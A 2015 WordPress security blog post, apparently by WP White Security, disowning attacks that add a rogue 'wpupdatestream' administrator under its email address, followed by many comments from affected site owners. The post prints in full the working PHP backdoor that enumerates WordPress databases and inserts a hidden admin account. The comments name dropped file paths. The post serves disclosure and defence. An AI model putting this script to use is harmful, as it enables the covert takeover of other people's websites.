Was Your WordPress Website Hacked by WP White Security?

Last updated on August 31st, 2015 by Robert Abela. Filed under WordPress Security News

Many who have had their WordPress website or blog hacked noticed a new WordPress user tempuser with the email address support@wpwhitesecurity.com on their WordPress so automatically they assumed it was us.

In fact lately we have been receiving a lot of emails from WordPress administrators asking us if we hacked their website. I do not blame such people, especially if they do not know about us but first of all, please note that we do not engage in such type of activity. We promote WordPress security and raise awareness about it as you can see from our WordPress security blog.

Deciphering the WordPress Hack Attack

Unfortunately we do not have much information about this type of WordPress hack attack. We have been in touch with several independent WordPress security professionals and with Sucuri as well, and all of us are trying to share as much information as we can about this attack but so far we do not have much information.

Creating a WordPress Administrator with WP White Security Email Address

The only thing we know so far is that the attackers are managing to upload the below script which when executed it creates the tempuser with WordPress administrator role. Once the user is created the attackers can login to WordPress via this user and tamper the WordPress website, or inject it with malware.

<?php
error_reporting(0);
if(isset($_GET['check']))
{
echo "pawet";
}
if(isset($_POST["v1"]))
{
   $link = mysql_connect($_POST["v1"], $_POST["v2"], $_POST["v3"]);
   $query = "SELECT table_schema,table_name FROM information_schema.tables WHERE table_schema NOT IN ( 'information_schema', 'performance_schema', 'mysql' )";
   $result = mysql_query($query);
   $tables_list = array();
   while ($line = mysql_fetch_array($result))
   {
      if (strpos($line["table_name"],'_options') !== false) {
$b = $line["table_schema"].".".$line["table_name"];
$query2 = "select concat(option_value,'|%5%5%5') from ".$b." where option_name='siteurl'";
$result2 = mysql_query($query2);
$row = mysql_fetch_row($result2);
if (strpos($row[0],'|%5%5%5') !== false) {
$p = explode("|", $row[0]);
$site_name = $p[0];
$p = explode("_", $line["table_name"]);
$table_p = $p[0]."_";
$db = $line["table_schema"];
array_push($tables_list,$b."<|>".$site_name."<|>".$table_p."<|>".$db);
}
      }  

}
foreach($tables_list as $aaa)
{
$list = explode("<|>", $aaa);
$table_pref = $list[2];
$site_name = $list[1];
$db = $list[3];
mysql_select_db($db);
$query = "INSERT INTO `".$table_pref."users` (`ID`, `user_login`, `user_pass`, `user_nicename`, `user_email`, `user_status`, `display_name`) VALUES ('9192191', 'wpupdatestream', '".base64_decode("JFAkQk5yZmE4eE1Memp0TVhFQjNaeC9IcnhjQXlmV21tLw==")."', 'tempuser', 'support@wpwhitesecurity.com', '0', 'Temp User')";
mysql_query($query);
$query = "INSERT INTO `".$table_pref."usermeta` (`umeta_id`,`user_id`,`meta_key`,`meta_value`) VALUES ('9192192', '9192191', '".$table_pref."capabilities', 'a:18:{s:13:\"administrator\";s:1:\"1\";s:34:\"wpml_manage_translation_management\";b:1;s:21:\"wpml_manage_languages\";b:1;s:41:\"wpml_manage_theme_and_plugin_localization\";b:1;s:19:\"wpml_manage_support\";b:1;s:29:\"wpml_manage_media_translation\";b:1;s:22:\"wpml_manage_navigation\";b:1;s:24:\"wpml_manage_sticky_links\";b:1;s:30:\"wpml_manage_string_translation\";b:1;s:33:\"wpml_manage_translation_analytics\";b:1;s:25:\"wpml_manage_wp_menus_sync\";b:1;s:32:\"wpml_manage_taxonomy_translation\";b:1;s:27:\"wpml_manage_troubleshooting\";b:1;s:31:\"wpml_manage_translation_options\";b:1;s:36:\"wpml_manage_woocommerce_multilingual\";b:1;s:37:\"wpml_operate_woocommerce_multilingual\";b:1;s:9:\"translate\";b:1;s:14:\"backwpup_admin\";b:1;}')";
mysql_query($query);
$query = "INSERT INTO `".$table_pref."usermeta` (`umeta_id`, `user_id`, `meta_key`, `meta_value`) VALUES ('9192191', '9192191', '".$table_pref."user_level', '10')";
mysql_query($query);


$query3 = "select user_login from `".$table_pref."users` where ID=9192191";
$result3 = mysql_query($query3);
$line3 = mysql_fetch_row($result3);
if($line3[0] == 'wpupdatestream')
{
echo $site_name."<|>wpupdatestream<|>p123123|new|";
}
}
    mysql_close($link);
}
?>

Why Is the WP White Security Email Address Used?

Good question. Most probably when the author was writing this script he got the SQL script example we used in our article How to Manually Add a WordPress Administrator to the Database using SQL Queries.

How Can WordPress Attackers Upload Such Script?

So far we do not have much information but it could be many things. They can upload such file by gaining FTP access because of weak passwords or an exploit on the server, or because they managed to gain root access to a web server through some old software, which could also be an old version of WordPress, a vulnerable plugin or WordPress theme. For example by exploiting the popular vulnerability in RevSlider plugin discovered a few months back, hackers can gain access to write files to the web server. The options are endless hence why you should at least always use strong passwords and  ensure all the software you use is the latest version.

Monitor WordPress To Catch Hackers Red Handed

The above hack is a perfect answer to why you should monitor all the activity on your WordPress and web server as well. Hence always make sure that all the software you run on your web server has logging enabled. If you have all the logs of your web server software and a WordPress monitoring solution such as WP Security Audit Log plugin you have a complete monitoring solution that allows you to track any suspicious behaviour before it becomes a security issue. Of if your WordPress website has already been hacked, logging can also help you trace back how the attack happened and address the security flaw.

In the meantime, if you have any more information about such attack please let us know by leaving a comment below or drop us an email on support@wpwhitesecurity.com.

WordPress Hosting, Firewall and Backup

WP White Security is hosted on A2 Hosting, protected with BBQ:Block Bad Queries Firewall and backed up with BlogVault online WordPress backup service

36 comments

Keely 09/09/2015

Hi guys,

This exact hack has happened to me, so thanks for the info!

Same user, and same email address. Wish I knew what the vulnerability is …

Robert Abela 10/09/2015

Hello Keely,

You’re welcome. Should you have any further information about the attack or need help from our end do not hesitate to get in touch.

Hey guys –

Somebody noticed we had a user on our site:

wpudatestream

with that email you show above. I checked on it, and it had admin privileges, so I changed it to have “NO ROLE” on our site currently while I followed up with y’all to see if this is still a hack?

Thanks!

Robert Abela 19/09/2015

Hello Scott,

Yes it is still a hack. You should try to dig deeper and see from where the user was generated. If you want further help with the forensics, please get in touch. We’d like to see what happened exactly and help you solve your issue.

Tammi 11/10/2015

How did you change them to no role, I have to do everything through my cpanel because I cant access my website

Robert Abela 15/10/2015

There is “no role” in WordPress. The best thing is to delete the user. I would recommend you to delete the user from the dashboard hence first think about gaining access back to the website first. You can reset the administrator’s password via PHPMyAdmin or by using FTP.

David 19/09/2015

I had the same thing happen to me

Curious what the vulnerability is/was – my site is still not back to normal

Robert Abela 19/09/2015

Hello David, you have to remove the infection for your site to return back to normal. Considering the attacker was able to execute a PHP script with malicious code it could be a remote code execution, else if they managed to upload files they could have gained access to your site’s files via other vulnerabilities in other network services so it is better to audit all the server.

Keely 21/09/2015

Hi David,

I had to upload a fresh copy of the wp-includes folder, and some of my themes’ files were hacked, so uploaded fresh copies of those.

Install a security plugin such as iThemes Security – https://wordpress.org/plugins/better-wp-security/ – which can prevent uploads/changes to folders. And let you know when suspicious activity is going on.

Let me know if you need any help 🙂

Robert Abela 23/09/2015

Hello Keely,

Did you find the source of the problem though? I.e. by just restoring a backup will only remove the infection but does not close the security flaw which was exploited, so the chance of getting hacked again are very high.

Jeffrey 22/09/2015

Me too.. Cleaning this up right now actually.. I did a search for “my site was hacked by support@wpwhitesecurity.com” and found this post.

Is there anything from these files that i’m deleting that could help you track this f#@&er down?

*also, as a side note, the CTA just below this form leads to a page not found (WSAL Notificiation Extension)

Robert Abela 23/09/2015

Hello Jeffrey,

Well so far what we have in that post is all the information we have so before deleting anything which you think might have been tampered during the attack, or have logs or anything else would appropriate if you can forward them to us before deleting it would be great.

* Thanks for the CTA. Fixed.

becky 30/09/2015

I’m trying to clean up after the same attack. All of the js files had some script inserted into them. I have the bad code if you’re interested.

Robert Abela 08/10/2015

Hello Becky,

Yes please. Send it to me on robert@wpwhitesecurity.com. Thank you.

David 30/09/2015

I have the same issue with my website, it was brought to my attention when Google notified me stating my site is suspected to contain malware and slapped a warning on my site, stopping people from viewing it. I have uploaded a previous back up but suspect the hack may have happened prior to my back up. little stuck with what to do next??? Any ideas?
Regard
David

Robert Abela 08/10/2015

Hello David,

Just send us an email on support@wpwhitesecurity.com and we will help you get sorted. Looking forward to hearing from you.

Tammi 11/10/2015

I also just got hacked by same , I have done nothing to remove him, I dont know where to start or if you could use any information

Robert Abela 15/10/2015

Hello Tammi,

What we have reported here is the “end result of a hack” i.e. what the hacker is doing to keep control of a WordPress website after exploiting the vulnerability. Which vulnerability did he exploit? It could be many so in your case you have to do a proper audit and find out. We can help you with that as well so feel free to get in touch.

We found the same user wpupdatestream and an image file pic.jpg. Inside that image file I found a JSON script with a base64 decoded string. I guess the hacker is playing from both side (in and out).

What I did is, I searched pic.jpg from cPanel file manager and deleted everything plus I deleted that user wpupdatestream(id=9192191) from wordpress DB. Looks like it is clean now but we are not sure.

I just wanted to share with you.

Thanks
Janaki

Robert Abela 15/10/2015

Hello Janaki,

Thank you very much for sharing. The problem in these cases is that you cleaned the damage / changes that the hacker did but you did not close the vulnerability he / she exploited. This article explains the “side effects” of a hack, i.e. what the hacker did after exploiting a vulnerability. So in your case I would recommend you to do a proper audit and find out what happened. For future reference, you should keep an audit trail of what is happening on your WordPress. It will definitely be handy.

Rob 27/10/2015

Hi,

I found a user a few weeks ago named “wpupdatestream” (email: support@wpwhitesecurity.com) in our user section. I couldn’t figure it out, but we had had a few other people working on the site recently and I figured one of them must have been doing something, so I simply deleted the user & all it’s content.

The other day, I logged in and the same user was back! I followed the instructions on this website:
http://odishajobseekers.com/did-you-see-wpupdatestream-user-in-your-wp_users-table/

So, I deleted the user AND the file “t44.php” from the wp-includes folder, which is the php file that contained the exact code you cited at the top of this post.

I’ve also reset our cPanel and FTP passwords & forced a reset for all our WP users.

So far, the user has not returned! Just wanted to let you know about that t44.php file.

WP White Security 09/11/2015

Thanks Rob. Yes the problem though remains; how did the attacker gain access to create the file t44.php? Ideally we should find the source of the problem.

magnus 10/02/2016

Did you find the source?
I want to know if some plugin or else was the way in?

Robert Abela 23/02/2016

Unfortunately we did not manage to gather much evidence so far. Should you have any information, please feel free to share it with us by sending us an email on support@wpwhitesecurity.com

A.Annon 22/02/2016

I have a server running many websites that are inundated with this problem.
I suspect it is due to a plugin named “Gravity Forms”

Robert Abela 23/02/2016

Thanks for sharing the information. If you have any logs or payload that you can share with us, please send it via email on robert@wpwhitesecurity.com

I dont think its Gravity Forms… I never used it, yet Ive been hacked 🙁

Robert Abela 22/03/2016

Hello Karolina,

You don’t have to have gravity forms to be hacked. Please send us an email on support@wpwhitesecurity.com if you need any help from our end.

Oh just got hacked by “you” guys… i had a user “support@wpwhitesecurity.com” got blacklisted… as I am in the process of changing hosting it is quite annoying… as whatever they have inserted spreaded over other sites on hosting… I am in deep poo I`d say ;/

Neil Gee 25/02/2016

I just had this too and seen the user :
9192191 wpupdatestream support@wpwhitesecurity.com

I currently have a Google slap on my site.

Every single JS file had appended malware on it as described here:
https://blog.sucuri.net/2016/02/massive-admedia-iframe-javascript-infection.html

My host also found a few infections:
/home/wpbeaches/public_html/wp-content/uploads/gravity_forms/123-08f553b398a4b4c85cb1b2e1d4c3ce1b/tmp/_input__test.php..4ee4d9.bak
/home/wpbeaches/public_html/wp-content/uploads/gravity_forms/2-d79068d65f2d7213620970702262b9de/tmp/_input_5_wow.phtml.ad11fa.bak

Most notably Gravity forms.

I asked for a review from Google but it failed – still working through the mire

George P. 02/03/2016

I also had this problem.
I checked my Uploads folder and found a php script inside a subfolder called: new_up.php
that had this script inside: http://pastebin.com/BvybRVSb

I removed the user from the database and restored 3 .js files that the hacker changed.
They were:

wp-admin/js/inline-edit-tax.js
wp-includes/js/colorpicker.js
wp-includes/js/imgareaselect/jquery.imgareaselect.js

Robert Abela 22/03/2016

Thanks for the feedback George. Would it be possible to send me a copy of the infected WordPress files to support@wpwhitesecurity.com?

beamkiller 08/03/2016

This happened me today too.

Our site was hacked with this user, post created.

Also created 5-6 .php files in plugins and uploads folder. Even changed the index.php file.

Robert Abela 22/03/2016

Hello Beamkiller,

Would it be possible to send us a copy of the infected index.php and 5-6.php? Rename their extension to txt please so they are not blocked. Please send them to support@wpwhitesecurity.com and thank you in advance.

Aykan Burçak 24/03/2016

Hello,
My website is also hacked and I saw the same user on my user list. I have some doubts about Ajax Comment Posting plugin. Are there anyone using this plugin?
Thanks…

Robert Abela 25/03/2016

Hi Aykan,

Please note that what you’re seeing is the post exploitation result. If the plugin is not vulnerable as such, then that is not the issue. Can you send us a copy of the infected files to support@wpwhitesecurity.com? Thank you.

Leave a Reply

Your email address will not be published. Required fields are marked *